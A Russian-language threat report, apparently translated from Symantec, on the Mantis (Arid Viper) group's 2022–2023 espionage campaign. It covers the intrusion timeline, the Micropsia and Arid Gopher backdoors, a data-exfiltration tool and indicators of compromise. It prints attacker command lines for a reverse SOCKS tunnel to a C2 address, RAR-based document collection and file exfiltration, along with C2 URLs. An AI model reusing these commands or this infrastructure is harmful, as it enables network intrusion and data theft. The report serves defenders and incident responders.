Группа кибершпионажа Mantis (она же Arid Viper, Desert Falcon, APT-C-23), действующая, как предполагается, с палестинских территорий, продолжает проводить атаки, развертывая обновленный набор инструментов и прилагая все усилия для поддержания постоянного присутствия в атакуемых сетях.
Хотя эта группа известна своими атаками на организации на Ближнем Востоке, последняя обнаруженная Symantec кампания Broadcom Software была направлена на организации на палестинских территориях, причем вредоносная активность началась в сентябре 2022 года и продолжалась по меньшей мере до февраля 2023 года. Подобные атаки не являются беспрецедентными для Mantis, и Symantec ранее обнаружила атаки на частных лиц, находящихся на палестинских территориях, в течение 2017 года.
Mantis APT
Mantis действует по меньшей мере с 2014 года, а по некоторым данным, полученным от третьих лиц, она могла действовать еще в 2011 году. Известно, что целью группы были организации в Израиле и ряде других стран Ближнего Востока. В число объектов нападения входят правительственные, военные, финансовые, медийные, образовательные, энергетические и аналитические центры. Группа известна тем, что использует фишинговые электронные письма и поддельные профили в социальных сетях для того, чтобы заманить жертв и заставить их установить вредоносное ПО на свои устройства.
По общему мнению, Mantis связана с палестинскими территориями. Хотя другие производители связывают эту группу с ХАМАС, Symantec не может однозначно отнести ее к какой-либо палестинской организации.
В своих последних атаках группа использовала обновленные версии своих собственных бэкдоров Micropsia и Arid Gopher для компрометации целей, а затем приступила к масштабной краже учетных данных и утечке похищенных данных.
Первоначальный вектор заражения в этой кампании остается неизвестным. В одной из организаций, ставшей объектом атаки, особенностью компрометации было то, что злоумышленники развернули три различные версии одного и того же набора инструментов (т.е. разные варианты одних и тех же инструментов) на трех группах компьютеров. Подобное разделение атаки, вероятно, было мерой предосторожности. Если бы один набор инструментов был обнаружен, злоумышленники все равно имели бы постоянное присутствие в сети объекта атаки.
Ниже приводится описание того, как использовался один из этих трех наборов инструментов:
Первые признаки вредоносной активности появились 18 декабря 2022 года. Три разных набора обфусцированных команд PowerShell были выполнены для загрузки Base64-кодированной строки, которая запускала встроенный шеллкод. Шеллкод представлял собой 32-битный стейджер, который загружал другой стейдж с помощью базового протокола на основе TCP с командно-контрольного (C&C) сервера: 104.194.222[.]50 порт 4444.
Злоумышленники вернулись 19 декабря, чтобы сбросить учетные данные перед загрузкой бэкдора Micropsia и Putty, общедоступного клиента SSH, используя Certutil и BITSAdmin.
Впоследствии Micropsia была запущена и инициировала контакт с сервером C&C. В тот же день Micropsia также была запущена на трех других машинах в той же организации. В каждом случае он запускался в папке, названной по имени файла:
- csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
- csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
- csidl_common_appdata\windowsps\windowsps.exe
На одном компьютере Micropsia использовалась для настройки обратного socks-туннеля к внешнему IP-адресу:
- CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [REDACTED].
20 декабря Micropsia была использована для запуска неизвестного исполняемого файла с именем windowspackages.exe на одном из зараженных компьютеров.
На следующий день, 21 декабря, был запущен RAR для архивирования файлов на другом зараженном компьютере.
В период с 22 декабря по 2 января 2023 года Micropsia использовалась для выполнения бэкдора Arid Gopher на трех зараженных компьютерах. Arid Gopher, в свою очередь, использовался для запуска инструмента SetRegRunKey.exe, который обеспечивал постоянство, добавляя Arid Gopher в реестр, чтобы он запускался при перезагрузке. Он также запускал неизвестный файл под названием localsecuritypolicy.exe (это имя файла использовалось злоумышленниками для бэкдора Arid Gopher в другом месте).
28 декабря Micropsia использовалась для запуска windowspackages.exe еще на трех зараженных компьютерах.
31 декабря Arid Gopher выполнил два неизвестных файла с именами networkswitcherdatamodell.exe и networkuefidiagsbootserver.exe на двух зараженных компьютерах.
2 января злоумышленники отменили версию Arid Gopher, которую они использовали, и представили новый вариант. Было ли это связано с тем, что первая версия была обнаружена, или это была стандартная операционная процедура, неизвестно.
4 января Micropsia была использована для выполнения двух неизвестных файлов, оба с именем hostupbroker.exe, на одном компьютере из папки: csidl_common_appdata\hostupbroker\hostupbroker.exe. За этим сразу же последовала эксфильтрация RAR-файла:
- CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar
9 января Arid Gopher был использован для выполнения двух неизвестных файлов на одном компьютере:
- csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
- csidl_common_appdata\embededmodeservice\embededmodeservice.exe
Последняя вредоносная активность наблюдалась с 12 января, когда Arid Gopher использовался для выполнения неизвестного файла localsecuritypolicy.exe каждые десять часов.
Micropsia
Варианты бэкдора Micropsia, использованные в этих атаках, похоже, являются слегка обновленными версиями тех, которые были замечены другими производителями. В этой кампании Micropsia была развернута с использованием нескольких имен файлов и путей к ним:
- csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
- csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
- csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
- csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
- csidl_common_appdata\windowsps\windowsps.exe
Micropsia выполняется с помощью WMI, и ее основной целью является запуск вторичных полезных нагрузок для злоумышленников. К ним относятся:
- Arid Gopher (имена файлов: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
- Reverse SOCKs Tunneler (он же Revsocks) (имя файла: windowsservicemanageav.exe)
- Инструмент эксфильтрации данных (имя файла: windowsupserv.exe)
- Два неизвестных файла, оба с именем hostupbroker.exe
- Неизвестный файл с именем windowspackages.exe
В дополнение к этому Micropsia имеет свои собственные функции, такие как создание скриншотов, кейлоггинг и архивирование определенных типов файлов с помощью WinRAR для подготовки к эксфильтрации данных:
- "%PROGRAMDATA%\Software Distributions\WinRAR\Rar. exe" a -r -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14
- "%PROGRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41" "%USERPROFILE%\*. xls" "%USERPROFILE%\*.xlsx" "%USERPROFILE%\*. doc"
- "%USERPROFILE%\*.docx" "%USERPROFILE%\*.csv" "%USERPROFILE%\*.pdf" "%USERPROFILE%\*.ppt" "%USERPROFILE%\*.pptx" "%USERPROFILE%\*. odt"
- "%USERPROFILE%\*.mdb" "%USERPROFILE%\*.accdb" "%USERPROFILE%\*.accde" "%USERPROFILE%\*.txt" "%USERPROFILE%\*.rtf" "%USERPROFILE%\*.vcf"
Arid Gopher
В отличие от Micropsia, которая написана на Delphi, Arid Gopher написан на Go. Версии Arid Gopher, использованные в этой кампании, содержат следующие встроенные компоненты:
- 7za.exe - копия легитимного исполняемого файла 7-Zip.
- AttestationWmiProvider.exe - инструмент, устанавливающий значение реестра "run".
- ServiceHubIdentityHost.exe - Копия легитимного исполняемого файла Shortcut.exe от Optimum X
- Setup.env - Конфигурационный файл
Arid Gopher также использовался для запуска следующих неизвестных файлов: networkswitcherdatamodell.exe, localsecuritypolicy.exe и networkuefidiagsbootserver.exe, а также для загрузки и выполнения файлов, обфусцированных с помощью PyArmor.
При общении с C&C-сервером Arid Gopher регистрирует устройство на одном пути, затем подключается к другому пути, вероятно, для получения команд:
Подключается к: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) - вероятно, регистрирует устройство.
За ним следует: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - вероятно, получает команды.
Подключается к: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) - вероятно, регистрирует устройство
За ним следует: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - вероятно получение команд.
Arid Gopher регулярно обновляется и переписывается злоумышленниками, скорее всего, для того, чтобы избежать обнаружения. Один из вариантов вредоносной программы радикально отличался от предыдущих версий, в которых была обновлена большая часть отличительного кода, настолько, что не было ни одной подпрограммы, содержащей идентичный отличительный код по сравнению с предыдущей версией. Судя по всему, Mantis агрессивно мутировал логику между вариантами, что является трудоемкой операцией, если ее выполнять вручную.
Инструмент эксфильтрации
Для эксфильтрации данных, похищенных у целевых организаций, злоумышленники также использовали специальный инструмент: 64-битный исполняемый файл PyInstaller под названием WindowsUpServ.exe. При запуске инструмент проверяет наличие следующих аргументов командной строки:
- "-d" "[FILE_DIRECTORY]"
- "-f" "[FILENAME]".
Для каждого аргумента командной строки "-f" "[FILENAME]" инструмент загружает содержимое [FILENAME]. Для каждого аргумента командной строки "-d" "[FILE_DIRECTORY]" инструмент получает список файлов, хранящихся в папке [FILE_DIRECTORY], и загружает содержимое каждого файла.
При загрузке каждого файла инструмент отправляет HTTP POST-запрос на C&C-сервер со следующими параметрами:
- "kjdfnqweb": [THE_FILE_CONTENT].
- "qyiwekqq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER].
Когда удаленный сервер отвечает кодом состояния 200, вредоносная программа удаляет загруженный файл с локального диска. Вредоносная программа также может записывать некоторые свои действия в следующие файлы:
- "C:\ProgramData\WindowsUpServ\success.txt"
- "C:\ProgramData\WindowsUpServ\err.txt"
Indicators of Compromise
Domains
- chloe-boreman.com
- criston-cole.com
- jumpstartmail.com
- paydayloansnew.com
- picture-world.info
- rnacgroup.com
- salimafia.net
- seomoi.net
- soft-utils.com
URLs
- http://5.182.39.44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu
SHA256
- 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038
- 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311
- 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e
- 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6
- 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa
- 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d
- 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8
- 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c
- 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529
- 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299
- 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f
- 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02
- 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4
- 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724
- 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e
- 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d
- 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689
- 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061
- 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4
- 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4
- 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097
- 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2
- b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3
- bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51
- bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9
- c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b
- cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341
- d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798
- d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842
- f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8
- f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203
- f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb